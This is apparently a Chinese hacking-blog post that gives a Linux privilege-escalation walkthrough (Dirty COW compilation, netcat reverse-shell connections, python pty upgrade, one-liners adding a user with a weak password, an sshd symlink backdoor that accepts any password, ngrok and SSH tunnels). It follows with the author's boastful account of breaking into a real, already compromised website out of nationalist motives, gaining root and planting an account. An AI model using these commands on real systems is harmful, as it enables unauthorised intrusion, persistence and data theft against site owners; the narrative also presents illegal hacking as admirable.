前言
首先关于Linux提权我们得先明白几个概念。
linux发行版本
是我们常说的Linux操作系统,也即是由Linux内核与各种常用软件的集合产品,全球大约有数百款的Linux系统版本,每个系统版本都有自己的特性和目标人群, 例如:
- CentOS
- redhat
- ubuntu
- kali
linux内核
Linux系统内核指的是一个由Linus Torvalds负责维护,提供硬件抽象层、硬盘及文件系统控制及多任务功能的系统核心程序。
正文
内核漏洞提权
说到内核提权就得提到脏牛了,这里先放一放,讲讲常规思路。
查看发行版本
查看内核版本
这样我们就得到了系统的内核版本
可以用kali自带的searchsploit来搜索exploitdb中的漏洞利用代码
searchsploit linux Debian 4
反弹shell
如果手里只有webshell可以利用反弹shell来得到一个shell
首先我们得有一个netcat
开启本地监听
直接连接目标主机
nc 192.168.1.1 8000
bash直接反弹
bash一句话shell反弹:个人感觉最好用的用的方法就是使用的方法就是使用bash结合重定向方法的一句话,具体命令如下。
(1) bash反弹一句话
(2)bash一句话命令详解
以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。
其实以上bash反弹一句完整的解读过程就是:
bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash 反弹环境。
具体各种反弹shell方式可参照安全客linux各种一句话反弹shell总结https://www.anquanke.com/post/id/87017
脏牛提权
参考链接:https://blog.csdn.net/DarkHQ/article/details/79222879
POC:https://github.com/FireFart/dirtycow
利用gcc编译dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt
反弹shell
python 一句话获取标准shell
python -c "import pty;pty.spawn('/bin/bash')"
命令详解:python 默认就包含有一个pty的标准库
linux 一句话添加账号
(1)chpasswd 方法
# useradd guest;echo 'guest:123456'|chpasswd
(2)useradd -p 方法
# useradd -p `openssl passwd 123456` guest
(3)echo -e 方法
# useradd test;echo -e "123456n123456n" |passwd test
内网穿透
没有外网IP的我只能搞内网映射了
参考链接http://tieba.baidu.com/p/4604965053
注册一个账号设置好
./ngrok tcp 9999
获得一个公网地址
screen命令
语法
screen [zxsq-anti-bbcode--AmRvx -ls -wipe][zxsq-anti-bbcode--d <作业名称>][zxsq-anti-bbcode--h <行数>][zxsq-anti-bbcode--r <作业名称>][zxsq-anti-bbcode--s ][zxsq-anti-bbcode--S <作业名称>]
选项
常用screen参数
例子
ssh相关
Linux后门
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;
经典后门。直接对sshd建立软连接,之后用任意密码登录即可
ssh -o "StrictHostKeyChecking no" -o UserKnownHostsFile=/dev/null -T -fND 192.168.0.110:8888 mail@127.0.0.1 -o 31337
ssh -o "StrictHostKeyChecking no" -T -fNR 8888:192.168.0.110:8888 proxy@公网ip
我不是黑阔
前言
编程玩的在好,我也不能写出完美的爱情
渗透玩的在强,我也不能提权进你的心
免杀玩的在狠,我也过不了你的主防御
纵使我多么的不可一世,也不是你的admin
会的再多又怎么样?没有了你,我就是一无所有
正文
抗韩之路
身为一名黑阔,
总是会不进想起前辈们的中美黑客大战。
物是人非事事休,
欲语泪先流。
想起那时候的一个个黑页,
内心突然澎湃了起来。
放我出去,我要日站。
身为一名黑阔,我明白我的责任所在。
就在这时,我盯上了一个之前早已沦陷的站。
就在这一刻我明白,肩上扛负着什么---抗韩从日站做起。
挂黑页 脱裤子 已经满足不了我了。
我需要的是你的所有。
提权
有了webshell之后,我看了一下我的权限。
不够不够不够。我需要的是你的root。
看发行版本,看内核。
原来是古物。
脏牛走起
提权成功。
但是由于菜刀的webshell并非是真实的shell,我无法切换到root用户。
所以我要反弹shell出来。
内网映射
身为一名黑阔,突然发现我竟然连个外网IP都没有。
在成为一名黑阔的路上,有条件要上,没有条件创造条件也要上。
没有外网就内网映射
我在https://ngrok.com/上注册了一个账号
ngrok启动
反弹shell
然后再获得一个标准shell
python -c "import pty;pty.spawn('/bin/bash')"
切换到DarkHQ
看看权限
这个时候我是SSH是连不上去的,因为他禁了root权限登入ssh,所以我新建了一个用户
即上面那句
useradd guest;echo 'guest:123456'|chpasswd
ssh连上普通账户
再切换到root账户
猜你还喜欢
- 08-04最全的webshell提权资料
- 09-16Linux后门整理合集
- 09-24Windows内网渗透提权的几个实用命令
- 09-10实战Linux下三种不同方式的提权技巧
- 08-03内网渗透:利用WMI代替psexec(WMIEXEC.vbs)
- 02-13ADB配置提权漏洞(CVE-2017-13212)原理与利用分析
- 11-16星外虚拟主机跨web目录文件读取技巧
- 06-05基于bro的计算机入侵取证实战分析
- 09-21渗透技巧——Windows单条日志的删除
- 08-03详解Filezilla提权
- 随机文章
-
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 围炉夜话|那些年我们一起追过的“萧何”
- 围炉夜话|渗透测试、人鱼线和补锅匠
- Linux下搭建hadoop集群环境
- 如何自己构建一个小型的Zoomeye—-从技术细节探讨到实现
- Android短信蠕虫XXshenqi分析
- 别以为有vpn我找不到你(网警抓人全过程)
- Struts 2 的开发者模式:一个OGNL后门
- PHP 数据类型
- php 取出周一和周日的时间戳
- PHP编程效率的20个要点
- Arpspoof的具体使用
- 没有Iphone也能装逼:让Android版QQ显示成Iphone6
- 利用Backtrack做Wifi钓鱼
- pptp的vpn真的安全吗?
- 技术揭秘:QQ空间莫名其妙转发是什么原因
- NFS打造Web图片服务器
- 通过Mesos、Docker和Go,使用300行代码创建一个分布式系统
- 用眼睛解读心灵
- 国产操作系统开发面临瓶颈
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-